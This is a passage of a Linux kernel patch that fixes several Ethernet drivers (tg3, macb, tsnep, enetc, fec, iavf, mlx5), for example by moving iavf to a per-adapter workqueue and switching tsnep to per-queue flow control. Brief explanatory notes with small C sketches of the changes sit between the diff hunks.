+@@ -18109,6 +18109,9 @@ static pci_ers_result_t tg3_io_error_detected(struct pci_dev *pdev,
+ 
+ 	netdev_info(netdev, "PCI I/O error detected\n");
+ 
++	/* Want to make sure that the reset task doesn't run */
++	tg3_reset_task_cancel(tp);
++
+ 	rtnl_lock();
+ 
+ 	/* Could be second call or maybe we don't have netdev yet */
+@@ -18125,9 +18128,6 @@ static pci_ers_result_t tg3_io_error_detected(struct pci_dev *pdev,
+ 
+ 	tg3_timer_stop(tp);
+ 
+-	/* Want to make sure that the reset task doesn't run */
+-	tg3_reset_task_cancel(tp);
+-
+ 	netif_device_detach(netdev);
+ 
+ 	/* Clean up software state, even if MMIO is blocked */
+diff --git a/drivers/net/ethernet/cadence/macb_main.c b/drivers/net/ethernet/cadence/macb_main.c
+index 4f63f1ba3161c..300f47ca42e3e 100644
+--- a/drivers/net/ethernet/cadence/macb_main.c
++++ b/drivers/net/ethernet/cadence/macb_main.c
+@@ -2188,7 +2188,6 @@ static int macb_pad_and_fcs(struct sk_buff **skb, struct net_device *ndev)
+ 	bool cloned = skb_cloned(*skb) || skb_header_cloned(*skb) ||
+ 		      skb_is_nonlinear(*skb);
+ 	int padlen = ETH_ZLEN - (*skb)->len;
+-	int headroom = skb_headroom(*skb);
+ 	int tailroom = skb_tailroom(*skb);
+ 	struct sk_buff *nskb;
+ 	u32 fcs;
+@@ -2202,9 +2201,6 @@ static int macb_pad_and_fcs(struct sk_buff **skb, struct net_device *ndev)
+ 		/* FCS could be appended to tailroom. */
+ 		if (tailroom >= ETH_FCS_LEN)
+ 			goto add_fcs;
+-		/* FCS could be appeded by moving data to headroom. */
+-		else if (!cloned && headroom + tailroom >= ETH_FCS_LEN)
+-			padlen = 0;
+ 		/* No room for FCS, need to reallocate skb. */
+ 		else
+ 			padlen = ETH_FCS_LEN;
+@@ -2213,10 +2209,7 @@ static int macb_pad_and_fcs(struct sk_buff **skb, struct net_device *ndev)
+ 		padlen += ETH_FCS_LEN;
+ 	}
+ 
+-	if (!cloned && headroom + tailroom >= padlen) {
+-		(*skb)->data = memmove((*skb)->head, (*skb)->data, (*skb)->len);
+-		skb_set_tail_pointer(*skb, (*skb)->len);
+-	} else {
++	if (cloned || tailroom < padlen) {
+ 		nskb = skb_copy_expand(*skb, 0, padlen, GFP_ATOMIC);
+ 		if (!nskb)
+ 			return -ENOMEM;
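
The macb change above reduces the padding logic to two cases: append in place when the skb is private and has tailroom, otherwise reallocate. The decision, reduced to a sketch under those assumptions (ensure_fcs_room() is an illustrative helper, not the driver's):

#include <linux/skbuff.h>
#include <linux/if_ether.h>

/* Return an skb with room for the 4-byte FCS: the original one when
 * it can be extended in place, otherwise a reallocated copy.
 */
static struct sk_buff *ensure_fcs_room(struct sk_buff *skb)
{
	struct sk_buff *nskb;

	if (!skb_cloned(skb) && skb_tailroom(skb) >= ETH_FCS_LEN)
		return skb;

	nskb = skb_copy_expand(skb, 0, ETH_FCS_LEN, GFP_ATOMIC);
	if (!nskb)
		return NULL;
	dev_kfree_skb_any(skb);
	return nskb;
}
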
+diff --git a/drivers/net/ethernet/engleder/tsnep_main.c b/drivers/net/ethernet/engleder/tsnep_main.c
+index 13d5ff4e0e020..6bf3cc11d2121 100644
+--- a/drivers/net/ethernet/engleder/tsnep_main.c
++++ b/drivers/net/ethernet/engleder/tsnep_main.c
+@@ -419,7 +419,7 @@ static netdev_tx_t tsnep_xmit_frame_ring(struct sk_buff *skb,
+ 		/* ring full; this should not happen because the queue is
+ 		 * stopped below when it fills up
+ 		 */
+-		netif_stop_queue(tx->adapter->netdev);
++		netif_stop_subqueue(tx->adapter->netdev, tx->queue_index);
+ 
+ 		spin_unlock_irqrestore(&tx->lock, flags);
+ 
+@@ -462,7 +462,7 @@ static netdev_tx_t tsnep_xmit_frame_ring(struct sk_buff *skb,
+ 
+ 	if (tsnep_tx_desc_available(tx) < (MAX_SKB_FRAGS + 1)) {
+ 		/* ring can get full with next frame */
+-		netif_stop_queue(tx->adapter->netdev);
++		netif_stop_subqueue(tx->adapter->netdev, tx->queue_index);
+ 	}
+ 
+ 	spin_unlock_irqrestore(&tx->lock, flags);
+@@ -472,11 +472,14 @@ static netdev_tx_t tsnep_xmit_frame_ring(struct sk_buff *skb,
+ 
+ static bool tsnep_tx_poll(struct tsnep_tx *tx, int napi_budget)
+ {
++	struct tsnep_tx_entry *entry;
++	struct netdev_queue *nq;
+ 	unsigned long flags;
+ 	int budget = 128;
+-	struct tsnep_tx_entry *entry;
+-	int count;
+ 	int length;
++	int count;
++
++	nq = netdev_get_tx_queue(tx->adapter->netdev, tx->queue_index);
+ 
+ 	spin_lock_irqsave(&tx->lock, flags);
+ 
+@@ -533,8 +536,8 @@ static bool tsnep_tx_poll(struct tsnep_tx *tx, int napi_budget)
+ 	} while (likely(budget));
+ 
+ 	if ((tsnep_tx_desc_available(tx) >= ((MAX_SKB_FRAGS + 1) * 2)) &&
+-	    netif_queue_stopped(tx->adapter->netdev)) {
+-		netif_wake_queue(tx->adapter->netdev);
++	    netif_tx_queue_stopped(nq)) {
++		netif_tx_wake_queue(nq);
+ 	}
+ 
+ 	spin_unlock_irqrestore(&tx->lock, flags);
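
tsnep is multi-queue, so stopping the whole device with netif_stop_queue() when a single ring filled was too broad; the hunks above switch to the per-queue helpers. The general pattern looks roughly like this (thresholds and names are illustrative):

#include <linux/netdevice.h>

/* Stop only the congested TX queue, and wake that same queue once the
 * completion path has freed enough descriptors (with hysteresis).
 */
static void tx_flow_control(struct net_device *ndev, u16 queue_index,
			    int free_desc, int stop_thresh, int wake_thresh)
{
	struct netdev_queue *nq = netdev_get_tx_queue(ndev, queue_index);

	if (free_desc < stop_thresh)
		netif_tx_stop_queue(nq);
	else if (free_desc >= wake_thresh && netif_tx_queue_stopped(nq))
		netif_tx_wake_queue(nq);
}
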
+diff --git a/drivers/net/ethernet/freescale/enetc/enetc.c b/drivers/net/ethernet/freescale/enetc/enetc.c
+index 3a79ead5219ae..e96449eedfb54 100644
+--- a/drivers/net/ethernet/freescale/enetc/enetc.c
++++ b/drivers/net/ethernet/freescale/enetc/enetc.c
+@@ -2290,14 +2290,14 @@ static void enetc_tx_onestep_tstamp(struct work_struct *work)
+ 
+ 	priv = container_of(work, struct enetc_ndev_priv, tx_onestep_tstamp);
+ 
+-	netif_tx_lock(priv->ndev);
++	netif_tx_lock_bh(priv->ndev);
+ 
+ 	clear_bit_unlock(ENETC_TX_ONESTEP_TSTAMP_IN_PROGRESS, &priv->flags);
+ 	skb = skb_dequeue(&priv->tx_skbs);
+ 	if (skb)
+ 		enetc_start_xmit(skb, priv->ndev);
+ 
+-	netif_tx_unlock(priv->ndev);
++	netif_tx_unlock_bh(priv->ndev);
+ }
+ 
+ static void enetc_tx_onestep_tstamp_init(struct enetc_ndev_priv *priv)
+diff --git a/drivers/net/ethernet/freescale/fec_main.c b/drivers/net/ethernet/freescale/fec_main.c
+index f250b0df27fbb..6f914180f4797 100644
+--- a/drivers/net/ethernet/freescale/fec_main.c
++++ b/drivers/net/ethernet/freescale/fec_main.c
+@@ -3089,7 +3089,7 @@ static void fec_enet_free_buffers(struct net_device *ndev)
+ 	for (q = 0; q < fep->num_rx_queues; q++) {
+ 		rxq = fep->rx_queue[q];
+ 		for (i = 0; i < rxq->bd.ring_size; i++)
+-			page_pool_release_page(rxq->page_pool, rxq->rx_skb_info[i].page);
++			page_pool_put_full_page(rxq->page_pool, rxq->rx_skb_info[i].page, false);
+ 
+ 		if (xdp_rxq_info_is_reg(&rxq->xdp_rxq))
+ 			xdp_rxq_info_unreg(&rxq->xdp_rxq);
+diff --git a/drivers/net/ethernet/intel/iavf/iavf.h b/drivers/net/ethernet/intel/iavf/iavf.h
+index 0d1bab4ac1b07..2a9f1eeeb7015 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf.h
++++ b/drivers/net/ethernet/intel/iavf/iavf.h
+@@ -249,6 +249,7 @@ struct iavf_cloud_filter {
+ 
+ /* board specific private data structure */
+ struct iavf_adapter {
++	struct workqueue_struct *wq;
+ 	struct work_struct reset_task;
+ 	struct work_struct adminq_task;
+ 	struct delayed_work client_task;
+@@ -459,7 +460,6 @@ struct iavf_device {
+ 
+ /* needed by iavf_ethtool.c */
+ extern char iavf_driver_name[];
+-extern struct workqueue_struct *iavf_wq;
+ 
+ static inline const char *iavf_state_str(enum iavf_state_t state)
+ {
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+index a056e15456153..83cfc54a47062 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+@@ -532,7 +532,7 @@ static int iavf_set_priv_flags(struct net_device *netdev, u32 flags)
+ 	if (changed_flags & IAVF_FLAG_LEGACY_RX) {
+ 		if (netif_running(netdev)) {
+ 			adapter->flags |= IAVF_FLAG_RESET_NEEDED;
+-			queue_work(iavf_wq, &adapter->reset_task);
++			queue_work(adapter->wq, &adapter->reset_task);
+ 		}
+ 	}
+ 
+@@ -672,7 +672,7 @@ static int iavf_set_ringparam(struct net_device *netdev,
+ 
+ 	if (netif_running(netdev)) {
+ 		adapter->flags |= IAVF_FLAG_RESET_NEEDED;
+-		queue_work(iavf_wq, &adapter->reset_task);
++		queue_work(adapter->wq, &adapter->reset_task);
+ 	}
+ 
+ 	return 0;
+@@ -1433,7 +1433,7 @@ static int iavf_add_fdir_ethtool(struct iavf_adapter *adapter, struct ethtool_rx
+ 	adapter->aq_required |= IAVF_FLAG_AQ_ADD_FDIR_FILTER;
+ 	spin_unlock_bh(&adapter->fdir_fltr_lock);
+ 
+-	mod_delayed_work(iavf_wq, &adapter->watchdog_task, 0);
++	mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+ 
+ ret:
+ 	if (err && fltr)
+@@ -1474,7 +1474,7 @@ static int iavf_del_fdir_ethtool(struct iavf_adapter *adapter, struct ethtool_rx
+ 	spin_unlock_bh(&adapter->fdir_fltr_lock);
+ 
+ 	if (fltr && fltr->state == IAVF_FDIR_FLTR_DEL_REQUEST)
+-		mod_delayed_work(iavf_wq, &adapter->watchdog_task, 0);
++		mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+ 
+ 	return err;
+ }
+@@ -1658,7 +1658,7 @@ iavf_set_adv_rss_hash_opt(struct iavf_adapter *adapter,
+ 	spin_unlock_bh(&adapter->adv_rss_lock);
+ 
+ 	if (!err)
+-		mod_delayed_work(iavf_wq, &adapter->watchdog_task, 0);
++		mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+ 
+ 	mutex_unlock(&adapter->crit_lock);
+ 
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index 260c55951c287..3dad834b9b8e5 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -49,7 +49,6 @@ MODULE_DESCRIPTION("Intel(R) Ethernet Adaptive Virtual Function Network Driver")
+ MODULE_LICENSE("GPL v2");
+ 
+ static const struct net_device_ops iavf_netdev_ops;
+-struct workqueue_struct *iavf_wq;
+ 
+ int iavf_status_to_errno(enum iavf_status status)
+ {
+@@ -277,7 +276,7 @@ void iavf_schedule_reset(struct iavf_adapter *adapter)
+ 	if (!(adapter->flags &
+ 	      (IAVF_FLAG_RESET_PENDING | IAVF_FLAG_RESET_NEEDED))) {
+ 		adapter->flags |= IAVF_FLAG_RESET_NEEDED;
+-		queue_work(iavf_wq, &adapter->reset_task);
++		queue_work(adapter->wq, &adapter->reset_task);
+ 	}
+ }
+ 
+@@ -291,7 +290,7 @@ void iavf_schedule_reset(struct iavf_adapter *adapter)
+ void iavf_schedule_request_stats(struct iavf_adapter *adapter)
+ {
+ 	adapter->aq_required |= IAVF_FLAG_AQ_REQUEST_STATS;
+-	mod_delayed_work(iavf_wq, &adapter->watchdog_task, 0);
++	mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+ }
+ 
+ /**
+@@ -411,7 +410,7 @@ static irqreturn_t iavf_msix_aq(int irq, void *data)
+ 
+ 	if (adapter->state != __IAVF_REMOVE)
+ 		/* schedule work on the private workqueue */
+-		queue_work(iavf_wq, &adapter->adminq_task);
++		queue_work(adapter->wq, &adapter->adminq_task);
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -1034,7 +1033,7 @@ int iavf_replace_primary_mac(struct iavf_adapter *adapter,
+ 
+ 	/* schedule the watchdog task to immediately process the request */
+ 	if (f) {
+-		queue_work(iavf_wq, &adapter->watchdog_task.work);
++		mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+ 		return 0;
+ 	}
+ 	return -ENOMEM;
+@@ -1257,7 +1256,7 @@ static void iavf_up_complete(struct iavf_adapter *adapter)
+ 	adapter->aq_required |= IAVF_FLAG_AQ_ENABLE_QUEUES;
+ 	if (CLIENT_ENABLED(adapter))
+ 		adapter->flags |= IAVF_FLAG_CLIENT_NEEDS_OPEN;
+-	mod_delayed_work(iavf_wq, &adapter->watchdog_task, 0);
++	mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+ }
+ 
+ /**
+@@ -1414,7 +1413,7 @@ void iavf_down(struct iavf_adapter *adapter)
+ 		adapter->aq_required |= IAVF_FLAG_AQ_DISABLE_QUEUES;
+ 	}
+ 
+-	mod_delayed_work(iavf_wq, &adapter->watchdog_task, 0);
++	mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+ }
+ 
+ /**
+@@ -2248,7 +2247,7 @@ iavf_set_vlan_offload_features(struct iavf_adapter *adapter,
+ 
+ 	if (aq_required) {
+ 		adapter->aq_required |= aq_required;
+-		mod_delayed_work(iavf_wq, &adapter->watchdog_task, 0);
++		mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+ 	}
+ }
+ 
+@@ -2700,7 +2699,7 @@ static void iavf_watchdog_task(struct work_struct *work)
+ 		adapter->aq_required = 0;
+ 		adapter->current_op = VIRTCHNL_OP_UNKNOWN;
+ 		mutex_unlock(&adapter->crit_lock);
+-		queue_work(iavf_wq, &adapter->reset_task);
++		queue_work(adapter->wq, &adapter->reset_task);
+ 		return;
+ 	}
+ 
+@@ -2708,31 +2707,31 @@ static void iavf_watchdog_task(struct work_struct *work)
+ 	case __IAVF_STARTUP:
+ 		iavf_startup(adapter);
+ 		mutex_unlock(&adapter->crit_lock);
+-		queue_delayed_work(iavf_wq, &adapter->watchdog_task,
++		queue_delayed_work(adapter->wq, &adapter->watchdog_task,
+ 				   msecs_to_jiffies(30));
+ 		return;
+ 	case __IAVF_INIT_VERSION_CHECK:
+ 		iavf_init_version_check(adapter);
+ 		mutex_unlock(&adapter->crit_lock);
+-		queue_delayed_work(iavf_wq, &adapter->watchdog_task,
++		queue_delayed_work(adapter->wq, &adapter->watchdog_task,
+ 				   msecs_to_jiffies(30));
+ 		return;
+ 	case __IAVF_INIT_GET_RESOURCES:
+ 		iavf_init_get_resources(adapter);
+ 		mutex_unlock(&adapter->crit_lock);
+-		queue_delayed_work(iavf_wq, &adapter->watchdog_task,
++		queue_delayed_work(adapter->wq, &adapter->watchdog_task,
+ 				   msecs_to_jiffies(1));
+ 		return;
+ 	case __IAVF_INIT_EXTENDED_CAPS:
+ 		iavf_init_process_extended_caps(adapter);
+ 		mutex_unlock(&adapter->crit_lock);
+-		queue_delayed_work(iavf_wq, &adapter->watchdog_task,
++		queue_delayed_work(adapter->wq, &adapter->watchdog_task,
+ 				   msecs_to_jiffies(1));
+ 		return;
+ 	case __IAVF_INIT_CONFIG_ADAPTER:
+ 		iavf_init_config_adapter(adapter);
+ 		mutex_unlock(&adapter->crit_lock);
+-		queue_delayed_work(iavf_wq, &adapter->watchdog_task,
++		queue_delayed_work(adapter->wq, &adapter->watchdog_task,
+ 				   msecs_to_jiffies(1));
+ 		return;
+ 	case __IAVF_INIT_FAILED:
+@@ -2751,14 +2750,14 @@ static void iavf_watchdog_task(struct work_struct *work)
+ 			adapter->flags |= IAVF_FLAG_PF_COMMS_FAILED;
+ 			iavf_shutdown_adminq(hw);
+ 			mutex_unlock(&adapter->crit_lock);
+-			queue_delayed_work(iavf_wq,
++			queue_delayed_work(adapter->wq,
+ 					   &adapter->watchdog_task, (5 * HZ));
+ 			return;
+ 		}
+ 		/* Try again from the failed step */
+ 		iavf_change_state(adapter, adapter->last_state);
+ 		mutex_unlock(&adapter->crit_lock);
+-		queue_delayed_work(iavf_wq, &adapter->watchdog_task, HZ);
++		queue_delayed_work(adapter->wq, &adapter->watchdog_task, HZ);
+ 		return;
+ 	case __IAVF_COMM_FAILED:
+ 		if (test_bit(__IAVF_IN_REMOVE_TASK,
+@@ -2789,13 +2788,14 @@ static void iavf_watchdog_task(struct work_struct *work)
+ 		adapter->aq_required = 0;
+ 		adapter->current_op = VIRTCHNL_OP_UNKNOWN;
+ 		mutex_unlock(&adapter->crit_lock);
+-		queue_delayed_work(iavf_wq,
++		queue_delayed_work(adapter->wq,
+ 				   &adapter->watchdog_task,
+ 				   msecs_to_jiffies(10));
+ 		return;
+ 	case __IAVF_RESETTING:
+ 		mutex_unlock(&adapter->crit_lock);
+-		queue_delayed_work(iavf_wq, &adapter->watchdog_task, HZ * 2);
++		queue_delayed_work(adapter->wq, &adapter->watchdog_task,
++				   HZ * 2);
+ 		return;
+ 	case __IAVF_DOWN:
+ 	case __IAVF_DOWN_PENDING:
+@@ -2834,9 +2834,9 @@ static void iavf_watchdog_task(struct work_struct *work)
+ 		adapter->aq_required = 0;
+ 		adapter->current_op = VIRTCHNL_OP_UNKNOWN;
+ 		dev_err(&adapter->pdev->dev, "Hardware reset detected\n");
+-		queue_work(iavf_wq, &adapter->reset_task);
++		queue_work(adapter->wq, &adapter->reset_task);
+ 		mutex_unlock(&adapter->crit_lock);
+-		queue_delayed_work(iavf_wq,
++		queue_delayed_work(adapter->wq,
+ 				   &adapter->watchdog_task, HZ * 2);
+ 		return;
+ 	}
+@@ -2845,12 +2845,13 @@ static void iavf_watchdog_task(struct work_struct *work)
+ 	mutex_unlock(&adapter->crit_lock);
+ restart_watchdog:
+ 	if (adapter->state >= __IAVF_DOWN)
+-		queue_work(iavf_wq, &adapter->adminq_task);
++		queue_work(adapter->wq, &adapter->adminq_task);
+ 	if (adapter->aq_required)
+-		queue_delayed_work(iavf_wq, &adapter->watchdog_task,
++		queue_delayed_work(adapter->wq, &adapter->watchdog_task,
+ 				   msecs_to_jiffies(20));
+ 	else
+-		queue_delayed_work(iavf_wq, &adapter->watchdog_task, HZ * 2);
++		queue_delayed_work(adapter->wq, &adapter->watchdog_task,
++				   HZ * 2);
+ }
+ 
+ /**
+@@ -2952,7 +2953,7 @@ static void iavf_reset_task(struct work_struct *work)
+ 	 */
+ 	if (!mutex_trylock(&adapter->crit_lock)) {
+ 		if (adapter->state != __IAVF_REMOVE)
+-			queue_work(iavf_wq, &adapter->reset_task);
++			queue_work(adapter->wq, &adapter->reset_task);
+ 
+ 		goto reset_finish;
+ 	}
+@@ -3116,7 +3117,7 @@ continue_reset:
+ 	bitmap_clear(adapter->vsi.active_cvlans, 0, VLAN_N_VID);
+ 	bitmap_clear(adapter->vsi.active_svlans, 0, VLAN_N_VID);
+ 
+-	mod_delayed_work(iavf_wq, &adapter->watchdog_task, 2);
++	mod_delayed_work(adapter->wq, &adapter->watchdog_task, 2);
+ 
+ 	/* We were running when the reset started, so we need to restore some
+ 	 * state here.
+@@ -3208,7 +3209,7 @@ static void iavf_adminq_task(struct work_struct *work)
+ 		if (adapter->state == __IAVF_REMOVE)
+ 			return;
+ 
+-		queue_work(iavf_wq, &adapter->adminq_task);
++		queue_work(adapter->wq, &adapter->adminq_task);
+ 		goto out;
+ 	}
+ 
+@@ -4349,7 +4350,7 @@ static int iavf_change_mtu(struct net_device *netdev, int new_mtu)
+ 
+ 	if (netif_running(netdev)) {
+ 		adapter->flags |= IAVF_FLAG_RESET_NEEDED;
+-		queue_work(iavf_wq, &adapter->reset_task);
++		queue_work(adapter->wq, &adapter->reset_task);
+ 	}
+ 
+ 	return 0;
+@@ -4898,6 +4899,13 @@ static int iavf_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	hw = &adapter->hw;
+ 	hw->back = adapter;
+ 
++	adapter->wq = alloc_ordered_workqueue("%s", WQ_MEM_RECLAIM,
++					      iavf_driver_name);
++	if (!adapter->wq) {
++		err = -ENOMEM;
++		goto err_alloc_wq;
++	}
++
+ 	adapter->msg_enable = BIT(DEFAULT_DEBUG_LEVEL_SHIFT) - 1;
+ 	iavf_change_state(adapter, __IAVF_STARTUP);
+ 
+@@ -4942,7 +4950,7 @@ static int iavf_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	INIT_WORK(&adapter->adminq_task, iavf_adminq_task);
+ 	INIT_DELAYED_WORK(&adapter->watchdog_task, iavf_watchdog_task);
+ 	INIT_DELAYED_WORK(&adapter->client_task, iavf_client_task);
+-	queue_delayed_work(iavf_wq, &adapter->watchdog_task,
++	queue_delayed_work(adapter->wq, &adapter->watchdog_task,
+ 			   msecs_to_jiffies(5 * (pdev->devfn & 0x07)));
+ 
+ 	/* Setup the wait queue for indicating transition to down status */
+@@ -4954,6 +4962,8 @@ static int iavf_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	return 0;
+ 
+ err_ioremap:
++	destroy_workqueue(adapter->wq);
++err_alloc_wq:
+ 	free_netdev(netdev);
+ err_alloc_etherdev:
+ 	pci_disable_pcie_error_reporting(pdev);
+@@ -5023,7 +5033,7 @@ static int __maybe_unused iavf_resume(struct device *dev_d)
+ 		return err;
+ 	}
+ 
+-	queue_work(iavf_wq, &adapter->reset_task);
++	queue_work(adapter->wq, &adapter->reset_task);
+ 
+ 	netif_device_attach(adapter->netdev);
+ 
+@@ -5170,6 +5180,8 @@ static void iavf_remove(struct pci_dev *pdev)
+ 	}
+ 	spin_unlock_bh(&adapter->adv_rss_lock);
+ 
++	destroy_workqueue(adapter->wq);
++
+ 	free_netdev(netdev);
+ 
+ 	pci_disable_pcie_error_reporting(pdev);
+@@ -5196,24 +5208,11 @@ static struct pci_driver iavf_driver = {
+  **/
+ static int __init iavf_init_module(void)
+ {
+-	int ret;
+-
+ 	pr_info("iavf: %s\n", iavf_driver_string);
+ 
+ 	pr_info("%s\n", iavf_copyright);
+ 
+-	iavf_wq = alloc_workqueue("%s", WQ_UNBOUND | WQ_MEM_RECLAIM, 1,
+-				  iavf_driver_name);
+-	if (!iavf_wq) {
+-		pr_err("%s: Failed to create workqueue\n", iavf_driver_name);
+-		return -ENOMEM;
+-	}
+-
+-	ret = pci_register_driver(&iavf_driver);
+-	if (ret)
+-		destroy_workqueue(iavf_wq);
+-
+-	return ret;
++	return pci_register_driver(&iavf_driver);
+ }
+ 
+ module_init(iavf_init_module);
+@@ -5227,7 +5226,6 @@ module_init(iavf_init_module);
+ static void __exit iavf_exit_module(void)
+ {
+ 	pci_unregister_driver(&iavf_driver);
+-	destroy_workqueue(iavf_wq);
+ }
+ 
+ module_exit(iavf_exit_module);
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+index 24a701fd140e9..0752fd67c96e5 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+@@ -1952,7 +1952,7 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 			if (!(adapter->flags & IAVF_FLAG_RESET_PENDING)) {
+ 				adapter->flags |= IAVF_FLAG_RESET_PENDING;
+ 				dev_info(&adapter->pdev->dev, "Scheduling reset task\n");
+-				queue_work(iavf_wq, &adapter->reset_task);
++				queue_work(adapter->wq, &adapter->reset_task);
+ 			}
+ 			break;
+ 		default:
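
The iavf hunks above retire the driver-global iavf_wq in favour of a per-adapter ordered workqueue, created in probe and torn down in remove, which among other things keeps one adapter's reset and watchdog work from blocking behind another's. The lifecycle, reduced to a sketch (my_adapter and my_work_fn are illustrative names):

#include <linux/workqueue.h>

struct my_adapter {
	struct workqueue_struct *wq;
	struct work_struct reset_task;
};

static void my_work_fn(struct work_struct *work)
{
	/* per-adapter work runs here, ordered within this queue */
}

static int my_adapter_init(struct my_adapter *ad, const char *name)
{
	ad->wq = alloc_ordered_workqueue("%s", WQ_MEM_RECLAIM, name);
	if (!ad->wq)
		return -ENOMEM;
	INIT_WORK(&ad->reset_task, my_work_fn);
	return 0;
}

static void my_adapter_fini(struct my_adapter *ad)
{
	cancel_work_sync(&ad->reset_task);
	destroy_workqueue(ad->wq);	/* drains remaining work first */
}
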
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/htb.c b/drivers/net/ethernet/mellanox/mlx5/core/en/htb.c
+index 6dac76fa58a3f..09d441ecb9f6d 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/htb.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/htb.c
+@@ -637,7 +637,7 @@ mlx5e_htb_update_children(struct mlx5e_htb *htb, struct mlx5e_qos_node *node,
+ 		if (child->bw_share == old_bw_share)
+ 			continue;
+ 
+-		err_one = mlx5_qos_update_node(htb->mdev, child->hw_id, child->bw_share,
++		err_one = mlx5_qos_update_node(htb->mdev, child->bw_share,
+ 					       child->max_average_bw, child->hw_id);
+ 		if (!err && err_one) {
+ 			err = err_one;
+@@ -671,7 +671,7 @@ mlx5e_htb_node_modify(struct mlx5e_htb *htb, u16 classid, u64 rate, u64 ceil,
+ 	mlx5e_htb_convert_rate(htb, rate, node->parent, &bw_share);
+ 	mlx5e_htb_convert_ceil(htb, ceil, &max_average_bw);
+ 
+-	err = mlx5_qos_update_node(htb->mdev, node->parent->hw_id, bw_share,
++	err = mlx5_qos_update_node(htb->mdev, bw_share,
+ 				   max_average_bw, node->hw_id);
+ 	if (err) {
+ 		NL_SET_ERR_MSG_MOD(extack, "Firmware error when modifying a node.");
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c
+index 1cbd2eb9d04f9..f2c2c752bd1c3 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c
+@@ -477,7 +477,6 @@ mlx5e_tc_sample_offload(struct mlx5e_tc_psample *tc_psample,
+ 	struct mlx5e_sample_flow *sample_flow;
+ 	struct mlx5e_sample_attr *sample_attr;
+ 	struct mlx5_flow_attr *pre_attr;
+-	u32 tunnel_id = attr->tunnel_id;
+ 	struct mlx5_eswitch *esw;
+ 	u32 default_tbl_id;
+ 	u32 obj_id;
+@@ -522,7 +521,7 @@ mlx5e_tc_sample_offload(struct mlx5e_tc_psample *tc_psample,
+ 	restore_obj.sample.group_id = sample_attr->group_num;
+ 	restore_obj.sample.rate = sample_attr->rate;
+ 	restore_obj.sample.trunc_size = sample_attr->trunc_size;
+-	restore_obj.sample.tunnel_id = tunnel_id;
++	restore_obj.sample.tunnel_id = attr->tunnel_id;
+ 	err = mapping_add(esw->offloads.reg_c0_obj_pool, &restore_obj, &obj_id);
+ 	if (err)
+ 		goto err_obj_id;
+@@ -548,7 +547,7 @@ mlx5e_tc_sample_offload(struct mlx5e_tc_psample *tc_psample,
+ 	/* For decap action, do decap in the original flow table instead of the
+ 	 * default flow table.
+ 	 */
+-	if (tunnel_id)
++	if (attr->action & MLX5_FLOW_CONTEXT_ACTION_DECAP)
+ 		pre_attr->action |= MLX5_FLOW_CONTEXT_ACTION_DECAP;
+ 	pre_attr->modify_hdr = sample_flow->restore->modify_hdr;
+ 	pre_attr->flags = MLX5_ATTR_FLAG_SAMPLE;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+index 4c313b7424bf5..c1cf3917baa43 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+@@ -157,6 +157,7 @@ struct mlx5_fs_chains *mlx5e_nic_chains(struct mlx5e_tc_table *tc)
+  * it's different than the ht->mutex here.
+  */
+ static struct lock_class_key tc_ht_lock_key;
++static struct lock_class_key tc_ht_wq_key;
+ 
+ static void mlx5e_put_flow_tunnel_id(struct mlx5e_tc_flow *flow);
+ static void free_flow_post_acts(struct mlx5e_tc_flow *flow);
+@@ -4971,6 +4972,7 @@ int mlx5e_tc_nic_init(struct mlx5e_priv *priv)
+ 		return err;
+ 
+ 	lockdep_set_class(&tc->ht.mutex, &tc_ht_lock_key);
++	lockdep_init_map(&tc->ht.run_work.lockdep_map, "tc_ht_wq_key", &tc_ht_wq_key, 0);
+ 
+ 	mapping_id = mlx5_query_nic_system_image_guid(dev);
+ 
+@@ -5077,6 +5079,7 @@ int mlx5e_tc_ht_init(struct rhashtable *tc_ht)
+ 		return err;
+ 
+ 	lockdep_set_class(&tc_ht->mutex, &tc_ht_lock_key);
++	lockdep_init_map(&tc_ht->run_work.lockdep_map, "tc_ht_wq_key", &tc_ht_wq_key, 0);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/qos.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/qos.c
+index 4f8a24d84a86a..75015d370922e 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/qos.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/qos.c
+@@ -22,15 +22,13 @@ struct mlx5_esw_rate_group {
+ };
+ 
